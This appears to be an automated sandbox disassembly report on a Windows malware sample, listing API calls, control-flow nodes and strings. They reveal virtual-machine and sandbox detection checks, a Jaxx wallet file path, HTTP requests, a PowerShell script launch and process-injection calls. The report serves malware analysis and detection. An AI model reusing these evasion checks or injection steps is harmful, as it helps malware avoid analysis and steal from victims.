11856->11859 11857->11852 11857->11853 11860 2b86cc1 SysAllocString 11858->11860 11864 2b86cd9 11858->11864 11861 2b86cb4 SysFreeString 11859->11861 11862 2b86cd6 SysFreeString 11860->11862 11861->11858 11862->11864 11863->11692 11864->11863 11865 2b86d0f SysAllocString 11864->11865 11868 2b86d47 11864->11868 11866 2b86d22 SysFreeString SysAllocString 11865->11866 11867 2b86d38 SysFreeString 11866->11867 11867->11868 11869 2b86dab 11868->11869 11870 2b86d89 SysAllocString 11868->11870 11873 2b86e0a SysAllocString 11869->11873 11875 2b86e6d 11869->11875 11871 2b86d9c SysFreeString 11870->11871 11871->11869 11872 2b86f0d 11872->11863 11876 2b86f36 VariantInit SysAllocString SysAllocString 11872->11876 11874 2b86e1d SysFreeString SysAllocString 11873->11874 11878 2b86e33 SysFreeString 11874->11878 11875->11872 11879 2b86ede SysAllocString 11875->11879 11877 2b86f98 SysFreeString VariantClear 11876->11877 11877->11863 11880 2b86e4a 11878->11880 11881 2b86ef1 SysFreeString 11879->11881 11880->11875 11882 2b86e4e SysAllocString 11880->11882 11881->11872 11883 2b86efb SysAllocString 11881->11883 11884 2b86e61 SysFreeString 11882->11884 11885 2b86f0a SysFreeString 11883->11885 11884->11875 11885->11872 11887 2b826cc 11886->11887 11887->11804 11887->11805 11889 2b866ba 11888->11889 11890 2b866c1 GetProcessHeap HeapAlloc 11888->11890 11917 2b864b0 11889->11917 11890->11889 11891 2b866df MultiByteToWideChar 11890->11891 11891->11889 11893 2b8670a InternetOpenW 11907 2b86708 11893->11907 11894 2b86746 InternetSetOptionW 11894->11894 11896 2b8675d InternetConnectW 11894->11896 11895 2b868b6 11897 2b868c9 GetProcessHeap HeapFree 11895->11897 11898 2b868d1 11895->11898 11901 2b86898 InternetCloseHandle 11896->11901 11902 2b86781 HttpOpenRequestW 11896->11902 11897->11898 11899 2b868d8 GetProcessHeap HeapFree 11898->11899 11900 2b868e0 11898->11900 11899->11900 11903 2b868ef 11900->11903 11904 2b868e7 GetProcessHeap HeapFree 11900->11904 11901->11895 11901->11907 11905 2b8688c 11902->11905 11906 2b867b7 InternetQueryOptionW 11902->11906 11903->11810 11904->11903 11908 2b86892 InternetCloseHandle 11905->11908 11909 2b867da InternetSetOptionW 11906->11909 11910 2b867f0 HttpSendRequestW 11906->11910 11907->11893 11907->11894 11907->11895 11908->11901 11909->11910 11911 2b86881 InternetCloseHandle 11910->11911 11913 2b86808 11910->11913 11911->11908 11912 2b86810 InternetQueryDataAvailable 11912->11913 11913->11911 11913->11912 11914 2b86848 GetProcessHeap HeapReAlloc 11913->11914 11915 2b86837 GetProcessHeap HeapAlloc 11913->11915 11916 2b86858 InternetReadFile 11914->11916 11915->11916 11916->11913 11918 2b864c0 InternetCrackUrlW 11917->11918 11920 2b865be 11918->11920 11921 2b86523 GetProcessHeap HeapAlloc 11918->11921 11920->11907 11921->11920 11923 2b8654c GetProcessHeap HeapAlloc 11921->11923 11923->11920

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 2b885f0-2b88600 call 2b890d0 3 2b88602-2b88610 0->3 3->3 4 2b88612-2b88638 EnumDisplayDevicesW 3->4 5 2b886aa-2b886de GetModuleHandleA GetProcAddress * 2 4->5 6 2b8863a 4->6 7 2b886e0-2b886e3 5->7 8 2b886e6-2b88724 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->8 9 2b88640-2b88651 StrStrIW 6->9 7->8 10 2b8874e-2b88750 8->10 11 2b88726-2b88728 8->11 12 2b88745-2b8874d 9->12 13 2b88657-2b88667 StrStrIW 9->13 15 2b88752 10->15 16 2b88757-2b887a4 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 10->16 11->10 14 2b8872a-2b88736 GetFileAttributesW 11->14 13->12 17 2b8866d-2b8867d StrStrIW 13->17 14->10 18 2b88738-2b8873a 14->18 15->16 20 2b887aa-2b887d2 16->20 21 2b887a6-2b887a8 16->21 17->12 19 2b88683-2b88693 StrStrIW 17->19 18->10 23 2b8873c-2b8873e 18->23 19->12 24 2b88699-2b886a8 EnumDisplayDevicesW 19->24 22 2b887d5-2b887fb PathCombineW GetFileAttributesW 20->22 21->12 21->20 25 2b887fd-2b887ff 22->25 26 2b88805 22->26 23->12 27 2b88740 23->27 24->5 24->9 25->26 28 2b88801-2b88803 25->28 29 2b88807-2b88817 26->29 27->12 28->29 29->22 30 2b88819-2b88822 29->30 30->12 31 2b88828-2b8886a PathCombineW * 2 GetFileAttributesW 30->31 32 2b889ee-2b88a13 PathCombineW GetFileAttributesW 31->32 33 2b88870-2b88872 31->33 35 2b88ad9-2b88afc ExpandEnvironmentStringsW GetFileAttributesW 32->35 36 2b88a19-2b88a1b 32->36 33->32 34 2b88878-2b88884 GetFileAttributesW 33->34 34->32 39 2b8888a-2b8888c 34->39 37 2b88afe-2b88b00 35->37 38 2b88b06 35->38 36->35 40 2b88a21-2b88a4d CreateFileW 36->40 37->38 41 2b88b02-2b88b04 37->41 42 2b88b08-2b88b0a 38->42 39->32 43 2b88892-2b888cb CreateFileW 39->43 44 2b88a4f-2b88a6e GetFileSize GetProcessHeap HeapAlloc 40->44 45 2b88a92-2b88a9a 40->45 41->42 50 2b88b0c-2b88b21 GetFileAttributesExW 42->50 51 2b88b2d-2b88b8c GetComputerNameW GetUserNameW 42->51 52 2b888cd-2b888ee GetFileSize GetProcessHeap HeapAlloc 43->52 53 2b8890e-2b88933 CreateFileW 43->53 46 2b88a89-2b88a8c CloseHandle 44->46 47 2b88a70-2b88a86 ReadFile 44->47 48 2b88abb-2b88abd 45->48 49 2b88a9c-2b88ab8 lstrcmpA 45->49 46->45 47->46 56 2b88acf-2b88ad3 48->56 57 2b88abf-2b88ac9 GetProcessHeap HeapFree 48->57 49->48 50->51 58 2b88b23-2b88b27 50->58 61 2b88b93-2b88ba5 lstrcmpW 51->61 59 2b888f0-2b88904 ReadFile 52->59 60 2b88907-2b88908 CloseHandle 52->60 54 2b88978-2b88980 53->54 55 2b88935-2b88954 GetFileSize GetProcessHeap HeapAlloc 53->55 65 2b889b9-2b889be 54->65 66 2b88982-2b88986 54->66 63 2b8896f-2b88972 CloseHandle 55->63 64 2b88956-2b8896c ReadFile 55->64 56->12 56->35 57->56 58->12 58->51 59->60 60->53 61->12 62 2b88bab-2b88bb0 61->62 62->61 67 2b88bb2-2b88bc6 StrStrW 62->67 63->54 64->63 69 2b889d0-2b889d2 65->69 70 2b889c0-2b889ca GetProcessHeap HeapFree 65->70 66->65 68 2b88988-2b88998 lstrcmpA 66->68 67->12 71 2b88bcc-2b88bdc lstrcmpW 67->71 68->65 72 2b8899a-2b889b6 lstrcmpA 68->72 73 2b889e4-2b889e8 69->73 74 2b889d4-2b889de GetProcessHeap HeapFree 69->74 70->69 75 2b88bde-2b88beb lstrcmpW 71->75 76 2b88bf1-2b88c08 71->76 72->65 73->12 73->32 74->73 75->12 75->76 77 2b88c10-2b88c1f lstrcmpW 76->77 77->12 78 2b88c25-2b88c2a 77->78 78->77 79 2b88c2c-2b88c59 GlobalMemoryStatusEx 78->79 79->12 80 2b88c5f-2b88c6f lstrcmpW 79->80 81 2b88c8c-2b88ca7 PathCombineW 80->81 82 2b88c71-2b88c7e lstrcmpW 80->82 84 2b88cb0-2b88cbe 81->84 82->81 83 2b88c80-2b88c86 82->83 83->12 83->81 84->84 85 2b88cc0-2b88cda FindFirstFileW 84->85 86 2b88ce0-2b88ce7 85->86 87 2b88dd2-2b88dff GetModuleFileNameW StrStrIW 85->87 88 2b88cf0-2b88d00 lstrcmpW 86->88 89 2b88da4-2b88db4 FindNextFileW 88->89 90 2b88d06-2b88d16 lstrcmpW 88->90 89->88 92 2b88dba-2b88dcc FindClose 89->92 90->89 91 2b88d1c-2b88d2e 90->91 93 2b88d30-2b88d45 91->93 94 2b88d47-2b88d59 lstrcmpW 91->94 92->12 92->87 93->93 93->94 95 2b88d5b-2b88d65 lstrcmpW 94->95 96 2b88d67-2b88d71 lstrcmpW 94->96 95->96 97 2b88da1 95->97 98 2b88d7f-2b88d90 96->98 99 2b88d73-2b88d7d lstrcmpW 96->99 97->89 98->89 100 2b88d92-2b88d99 98->100 99->97 99->98 100->89 101 2b88d9b-2b88d9f 100->101 101->89
            APIs
            • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 02B8862E
            • StrStrIW.KERNELBASE(?,Hyper-V), ref: 02B8864D
            • StrStrIW.SHLWAPI(?,VMWare), ref: 02B88663
            • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 02B88679
            • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 02B8868F
            • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 02B886A4
            • GetModuleHandleA.KERNEL32(kernel32), ref: 02B886AF
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 02B886C3
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 02B886CE
            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 02B886FD
            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 02B88710
            • GetFileAttributesW.KERNELBASE(?), ref: 02B8871F
            • GetFileAttributesW.KERNEL32(?), ref: 02B88731
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
            • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$ANNA-PC$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
            • API String ID: 4266617301-3915609787
            • Opcode ID: a216744b56892ff18ae39a7f544872ac746c00cedc7fd85f3e77c432bae6c7be
            • Instruction ID: 3985d57e0e75d91f64140da1b4e228b378f81c6437295c6118d606bc9e3bcfc2
            • Opcode Fuzzy Hash: a216744b56892ff18ae39a7f544872ac746c00cedc7fd85f3e77c432bae6c7be
            • Instruction Fuzzy Hash: D3228B71D4025DABEB20ABA4CC48FEEBBB8FF04748F500595E91CE7190E7709A45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 102 8f1300-8f1350 GetModuleHandleA VirtualAlloc 103 8f1359-8f1387 call 8f6380 102->103 104 8f1352-8f1354 102->104 109 8f1395-8f13a2 103->109 105 8f16a6-8f16b3 call 8f3a94 104->105 111 8f13a4-8f13df call 8f6380 109->111 112 8f13e1-8f13f9 109->112 111->109 114 8f14ef-8f1528 call 8f11f0 VirtualProtect 112->114 115 8f13ff-8f1406 112->115 122 8f1536-8f1543 114->122 115->114 118 8f140c-8f1417 115->118 121 8f1422-8f1429 118->121 121->114 123 8f142f-8f1463 GetModuleHandleA GetProcAddress LoadLibraryA 121->123 124 8f164a-8f1663 122->124 125 8f1549-8f1571 122->125 126 8f14ea 123->126 127 8f1469-8f1486 123->127 129 8f1665-8f1679 124->129 130 8f16a3 124->130 131 8f1593-8f15ad 125->131 132 8f1573-8f1591 VirtualFree 125->132 126->121 133 8f148e 127->133 134 8f1488-8f148b 127->134 135 8f1684-8f1688 129->135 130->105 137 8f15af-8f15b6 131->137 138 8f15b8 131->138 136 8f152a-8f1532 132->136 139 8f14a2-8f14a8 133->139 134->133 135->130 141 8f168a-8f1690 135->141 136->122 142 8f15bf-8f15c7 137->142 138->142 139->126 140 8f14aa-8f14b5 139->140 145 8f14b7-8f14c4 140->145 146 8f14c6-8f14d2 140->146 141->130 147 8f1692-8f16a1 141->147 143 8f15c9-8f15d0 142->143 144 8f15d2 142->144 148 8f15d9-8f15e2 143->148 144->148 149 8f14d5-8f14e8 GetProcAddress 145->149 146->149 147->135 151 8f15ed 148->151 152 8f15e4-8f15eb 148->152 149->139 155 8f15f4-8f1616 151->155 152->155 156 8f1618-8f1621 155->156 157 8f1624-8f163f VirtualProtect 155->157 156->157 157->124
            APIs
            • GetModuleHandleA.KERNEL32(kernel32), ref: 008F132A
            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 008F1343
            • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 008F1439
            • GetProcAddress.KERNEL32(00000000), ref: 008F1440
            • LoadLibraryA.KERNELBASE(?), ref: 008F1459
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
            • String ID: LoadLibraryA$kernel32
            • API String ID: 3393750808-970291620
            • Opcode ID: aa09247d2304a07330c36ba8aa35c67ab0ca15033c051c2c1d5f27c156fe3ded
            • Instruction ID: 81cea1ca3f293b1ec31a9652dca2e7ebf68500b15613a874cca133eea893720e
            • Opcode Fuzzy Hash: aa09247d2304a07330c36ba8aa35c67ab0ca15033c051c2c1d5f27c156fe3ded
            • Instruction Fuzzy Hash: 06D1D275E00219DFCF08CFA8D894ABEB7B6FF98304F248159E506AB395D734A981CB54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 008F2F77
            • GetLastError.KERNEL32 ref: 008F2F81
            • ExitProcess.KERNEL32 ref: 008F2F8E
            • BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 008F2F9D
            • GetCurrentProcess.KERNEL32(00000000), ref: 008F2FA9
            • TerminateProcess.KERNEL32(00000000), ref: 008F2FB0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
            • String ID: jhl46745fghb
            • API String ID: 3772419538-1856006033
            • Opcode ID: 8edaebc35a4047c4cefc305a2815bf13e0ec104221193b7f12f1c2f03bf6c144
            • Instruction ID: 8be330fd67907905a9b3fd46b96f52c5fc565fceec905ca2f9500adef293a976
            • Opcode Fuzzy Hash: 8edaebc35a4047c4cefc305a2815bf13e0ec104221193b7f12f1c2f03bf6c144
            • Instruction Fuzzy Hash: 4E014C34A14348AFEB20AFB4DD0ABADB774FF05701F004098E686EA191DF749944EB52
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 172 2b88e00-2b88e17 GetUserDefaultLangID 173 2b88eac-2b88eae ExitProcess 172->173 174 2b88e1d-2b88e25 172->174 174->173 175 2b88e2b-2b88e33 174->175 175->173 176 2b88e35-2b88e3d 175->176 176->173 177 2b88e3f-2b88e47 176->177 177->173 178 2b88e49-2b88e51 177->178 178->173 179 2b88e53-2b88e5b 178->179 179->173 180 2b88e5d-2b88e65 179->180 180->173 181 2b88e67-2b88e6f 180->181 181->173 182 2b88e71-2b88e79 181->182 182->173 183 2b88e7b-2b88e83 182->183 183->173 184 2b88e85 call 2b885f0 183->184 186 2b88e8a-2b88e8c 184->186 186->173 187 2b88e8e-2b88ea7 call 2b88310 call 2b87120 call 2b88f70 call 2b87620 call 2b88500 186->187 187->173
            APIs
            • GetUserDefaultLangID.KERNEL32 ref: 02B88E06
            • ExitProcess.KERNEL32 ref: 02B88EAE
              • Part of subcall function 02B885F0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 02B8862E
              • Part of subcall function 02B885F0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 02B8864D
              • Part of subcall function 02B885F0: StrStrIW.SHLWAPI(?,VMWare), ref: 02B88663
              • Part of subcall function 02B885F0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 02B88679
              • Part of subcall function 02B885F0: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 02B8868F
              • Part of subcall function 02B885F0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 02B886A4
              • Part of subcall function 02B885F0: GetModuleHandleA.KERNEL32(kernel32), ref: 02B886AF
              • Part of subcall function 02B885F0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 02B886C3
              • Part of subcall function 02B885F0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 02B886CE
              • Part of subcall function 02B885F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 02B886FD
              • Part of subcall function 02B885F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 02B88710
              • Part of subcall function 02B885F0: GetFileAttributesW.KERNELBASE(?), ref: 02B8871F
              • Part of subcall function 02B885F0: GetFileAttributesW.KERNEL32(?), ref: 02B88731
              • Part of subcall function 02B88310: InitializeCriticalSection.KERNEL32(02B8A088), ref: 02B88332
              • Part of subcall function 02B88310: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B8835F
              • Part of subcall function 02B88310: StringFromGUID2.OLE32(?,?,00000080), ref: 02B883B8
              • Part of subcall function 02B88310: wsprintfA.USER32 ref: 02B883CF
              • Part of subcall function 02B88310: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 02B883E3
              • Part of subcall function 02B88310: GetLastError.KERNEL32 ref: 02B883EE
              • Part of subcall function 02B88310: WSAStartup.WS2_32(00000202,?), ref: 02B8842C
              • Part of subcall function 02B88310: CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 02B88445
              • Part of subcall function 02B88310: CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 02B88461
              • Part of subcall function 02B87120: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 02B87141
              • Part of subcall function 02B87120: lstrlenW.KERNEL32(?), ref: 02B8714A
              • Part of subcall function 02B87120: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 02B87165
              • Part of subcall function 02B87120: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 02B87173
              • Part of subcall function 02B87120: GetLastError.KERNEL32 ref: 02B8717D
              • Part of subcall function 02B87120: wnsprintfW.SHLWAPI ref: 02B87199
              • Part of subcall function 02B87120: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 02B871B5
              • Part of subcall function 02B87120: wnsprintfW.SHLWAPI ref: 02B871CF
              • Part of subcall function 02B87120: SetFileAttributesW.KERNEL32(?,00000006), ref: 02B871EF
              • Part of subcall function 02B88F70: CryptGenRandom.ADVAPI32(00000020,?), ref: 02B88F88
              • Part of subcall function 02B88F70: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B88FE5
              • Part of subcall function 02B88F70: HeapFree.KERNEL32(00000000), ref: 02B88FEC
              • Part of subcall function 02B88F70: wsprintfA.USER32 ref: 02B8901F
              • Part of subcall function 02B88F70: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B89058
              • Part of subcall function 02B88F70: HeapFree.KERNEL32(00000000), ref: 02B8905B
              • Part of subcall function 02B88F70: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B89060
              • Part of subcall function 02B88F70: HeapFree.KERNEL32(00000000), ref: 02B89063
              • Part of subcall function 02B87620: LsaOpenPolicy.ADVAPI32(00000000,02B8A060,00000001,?), ref: 02B8765C
              • Part of subcall function 02B87620: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 02B8766F
              • Part of subcall function 02B87620: GetProcessHeap.KERNEL32(00000008,?), ref: 02B8768B
              • Part of subcall function 02B87620: HeapAlloc.KERNEL32(00000000), ref: 02B87692
              • Part of subcall function 02B87620: LsaFreeMemory.ADVAPI32(?), ref: 02B876CC
              • Part of subcall function 02B87620: LsaClose.ADVAPI32(?), ref: 02B876D5
              • Part of subcall function 02B87620: GetComputerNameW.KERNEL32(?,?), ref: 02B876F4
              • Part of subcall function 02B87620: GetUserNameW.ADVAPI32(?,00000101), ref: 02B87705
              • Part of subcall function 02B88500: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 02B88521
              • Part of subcall function 02B88500: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 02B88534
              • Part of subcall function 02B88500: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 02B88547
              • Part of subcall function 02B88500: GetFileAttributesW.KERNEL32(?), ref: 02B8856D
              • Part of subcall function 02B88500: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 02B8859D
              • Part of subcall function 02B88500: wnsprintfW.SHLWAPI ref: 02B885C0
              • Part of subcall function 02B88500: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 02B885E2
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Cryptwnsprintf$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
            • String ID:
            • API String ID: 2686793623-0
            • Opcode ID: 639a829bb5ccf6c1acdcaa1d14372bab9768f6dea51668027f1a35e8141839bb
            • Instruction ID: 483b49e310cf3d7b97a0e90f83610c151b76e48324b42cb291fd843876eae29a
            • Opcode Fuzzy Hash: 639a829bb5ccf6c1acdcaa1d14372bab9768f6dea51668027f1a35e8141839bb
            • Instruction Fuzzy Hash: 81012B5E62110A8BEF34B55848242B82143DFD0B2AFD885A96BDE47DC59F081E83D65F
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 198 8f1710-8f175a call 8f1110 * 2 203 8f183f-8f1858 call 8f6940 call 8f3a94 198->203 204 8f1760-8f1764 198->204 204->203 205 8f176a-8f176e 204->205 205->203 207 8f1774-8f1778 205->207 207->203 209 8f177e-8f179c call 8f6b68 207->209 214 8f17a7-8f17ad 209->214 215 8f17af-8f17c0 214->215 216 8f17c2-8f182b call 8f16c0 call 8f1300 GetPEB GetUserDefaultLangID call 8f6940 214->216 215->214 223 8f1830-8f183c call 8f6940 216->223 223->203
            APIs
              • Part of subcall function 008F1110: GetModuleHandleA.KERNEL32(kernel32), ref: 008F111B
              • Part of subcall function 008F1110: GetModuleHandleW.KERNEL32(00000000), ref: 008F1162
            • GetUserDefaultLangID.KERNELBASE ref: 008F1824
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule$DefaultLangUser
            • String ID:
            • API String ID: 3410018322-0
            • Opcode ID: ce53d5113b9bd42f790fb992987374619a8164cf104cdcbaa5414ef6ad4430de
            • Instruction ID: 12fb40c70ee3eafaac8122f4b2e15f715aff3281d441832498132cd9185be9df
            • Opcode Fuzzy Hash: ce53d5113b9bd42f790fb992987374619a8164cf104cdcbaa5414ef6ad4430de
            • Instruction Fuzzy Hash: 4141E4B5E00209DBCF04DFA8C885AEEB7B5FF48304F148559D605A7341E735AA55CFA2
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetModuleHandleW.KERNEL32(ntdll), ref: 02B85E2D
            • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 02B85E41
            • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 02B85E4C
            • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 02B85E57
            • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 02B85E62
            • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 02B85E6D
            • GetTempPathW.KERNEL32(000000F6,?), ref: 02B85E86
              • Part of subcall function 02B824F0: GetTickCount.KERNEL32 ref: 02B824F2
            • wnsprintfW.SHLWAPI ref: 02B85EC1
            • PathCombineW.SHLWAPI(?,?,?), ref: 02B85EDB
            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 02B85F02
            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02B85F26
            • SetEndOfFile.KERNEL32(00000000), ref: 02B85F29
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B85F36
            • wnsprintfW.SHLWAPI ref: 02B85F54
            • RtlInitUnicodeString.NTDLL(?,?), ref: 02B85F6A
            • RtlInitUnicodeString.NTDLL(?,?), ref: 02B85F77
            • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 02B85FB6
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B86005
            • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 02B8604F
            • FlushFileBuffers.KERNEL32(00000000), ref: 02B86057
            • SetEndOfFile.KERNEL32(00000000), ref: 02B8605E
            • NtQueryInformationProcess.NTDLL ref: 02B86073
            • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 02B8609B
            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 02B860F2
            • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02B8612E
            • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 02B8613C
            • NtClose.NTDLL ref: 02B86175
            • NtClose.NTDLL ref: 02B86186
            • NtClose.NTDLL ref: 02B86190
            • CloseHandle.KERNEL32(00000000), ref: 02B86193
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
